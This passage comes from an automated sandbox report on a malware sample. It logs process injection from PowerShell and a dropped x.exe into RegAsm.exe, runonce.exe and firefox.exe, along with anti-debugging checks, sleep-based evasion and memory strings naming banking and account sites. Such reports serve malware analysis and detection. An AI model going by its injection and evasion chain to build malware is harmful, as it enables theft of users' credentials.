Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FFB2CECD7E4
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\runonce.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 1340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 3000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 5000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 56D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 66D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 6800000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory allocated: 7800000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2530	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 662	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Window / User API: threadDelayed 9842	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	API coverage: 0.8 %
Source: C:\Windows\SysWOW64\runonce.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1412	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2716	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 7160	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe TID: 1860	Thread sleep count: 131 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe TID: 1860	Thread sleep time: -262000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe TID: 1860	Thread sleep count: 9842 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe TID: 1860	Thread sleep time: -19684000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe TID: 316	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe TID: 316	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe TID: 316	Thread sleep time: -55500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe TID: 316	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe TID: 316	Thread sleep time: -38000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\runonce.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\runonce.exe	Last function: Thread delayed

Source: 6511-iOQ--.15.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 6511-iOQ--.15.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 6511-iOQ--.15.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 6511-iOQ--.15.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 6511-iOQ--.15.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 6511-iOQ--.15.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 6511-iOQ--.15.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 6511-iOQ--.15.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: 6511-iOQ--.15.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 6511-iOQ--.15.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: 6511-iOQ--.15.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 6511-iOQ--.15.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 6511-iOQ--.15.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 6511-iOQ--.15.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: 6511-iOQ--.15.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 6511-iOQ--.15.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: runonce.exe, 0000000F.00000002.3728763168.000000000364A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.2033859955.0000021BD65FD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 6511-iOQ--.15.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: pWjI78htpJ4.exe, 00000010.00000002.3730610479.00000000013C9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
Source: 6511-iOQ--.15.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 6511-iOQ--.15.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: 6511-iOQ--.15.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 6511-iOQ--.15.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 6511-iOQ--.15.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 6511-iOQ--.15.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: 6511-iOQ--.15.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: 6511-iOQ--.15.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 6511-iOQ--.15.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 6511-iOQ--.15.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: 6511-iOQ--.15.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 6511-iOQ--.15.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: 6511-iOQ--.15.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 6511-iOQ--.15.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtWriteVirtualMemory: Direct from: 0x77762E3C	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtMapViewOfSection: Direct from: 0x77762D1C	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtNotifyChangeKey: Direct from: 0x77763C2C	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtCreateMutant: Direct from: 0x777635CC	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtResumeThread: Direct from: 0x777636AC	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtProtectVirtualMemory: Direct from: 0x77757B2E	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtQuerySystemInformation: Direct from: 0x77762DFC	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtAllocateVirtualMemory: Direct from: 0x77762BFC	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtReadFile: Direct from: 0x77762ADC	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtDelayExecution: Direct from: 0x77762DDC	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtWriteVirtualMemory: Direct from: 0x7776490C	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtQueryInformationProcess: Direct from: 0x77762C26	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtResumeThread: Direct from: 0x77762FBC	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtCreateUserProcess: Direct from: 0x7776371C	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtSetInformationThread: Direct from: 0x777563F9	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtAllocateVirtualMemory: Direct from: 0x77763C9C	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtSetInformationThread: Direct from: 0x77762B4C	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtQueryAttributesFile: Direct from: 0x77762E6C	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtReadVirtualMemory: Direct from: 0x77762E8C	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtCreateKey: Direct from: 0x77762C6C	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtQuerySystemInformation: Direct from: 0x777648CC	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtAllocateVirtualMemory: Direct from: 0x777648EC	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtQueryVolumeInformationFile: Direct from: 0x77762F2C	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtOpenSection: Direct from: 0x77762E0C	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtDeviceIoControlFile: Direct from: 0x77762AEC	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtAllocateVirtualMemory: Direct from: 0x77762BEC	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtQueryInformationToken: Direct from: 0x77762CAC	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtTerminateThread: Direct from: 0x77762FCC	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtCreateFile: Direct from: 0x77762FEC	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtOpenFile: Direct from: 0x77762DCC	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtOpenKeyEx: Direct from: 0x77762B9C	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtSetInformationProcess: Direct from: 0x77762C5C	Jump to behavior
Source: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe	NtProtectVirtualMemory: Direct from: 0x77762F9C	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: NULL target: C:\Windows\SysWOW64\runonce.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: NULL target: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: NULL target: C:\Program Files (x86)\rsHocUcVlFhHrLxlWJwNhNsDAIOzcaLDYsIBUOaXAKPWHe\pWjI78htpJ4.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\runonce.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1173008	Jump to behavior

Source: pWjI78htpJ4.exe, 0000000E.00000002.3730361508.00000000015E0000.00000002.00000001.00040000.00000000.sdmp, pWjI78htpJ4.exe, 0000000E.00000000.1659343101.00000000015E1000.00000002.00000001.00040000.00000000.sdmp, pWjI78htpJ4.exe, 00000010.00000000.1801090549.0000000001931000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: pWjI78htpJ4.exe, 0000000E.00000002.3730361508.00000000015E0000.00000002.00000001.00040000.00000000.sdmp, pWjI78htpJ4.exe, 0000000E.00000000.1659343101.00000000015E1000.00000002.00000001.00040000.00000000.sdmp, pWjI78htpJ4.exe, 00000010.00000000.1801090549.0000000001931000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: pWjI78htpJ4.exe, 0000000E.00000002.3730361508.00000000015E0000.00000002.00000001.00040000.00000000.sdmp, pWjI78htpJ4.exe, 0000000E.00000000.1659343101.00000000015E1000.00000002.00000001.00040000.00000000.sdmp, pWjI78htpJ4.exe, 00000010.00000000.1801090549.0000000001931000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: ?Program Manager
Source: pWjI78htpJ4.exe, 0000000E.00000002.3730361508.00000000015E0000.00000002.00000001.00040000.00000000.sdmp, pWjI78htpJ4.exe, 0000000E.00000000.1659343101.00000000015E1000.00000002.00000001.00040000.00000000.sdmp, pWjI78htpJ4.exe, 00000010.00000000.1801090549.0000000001931000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
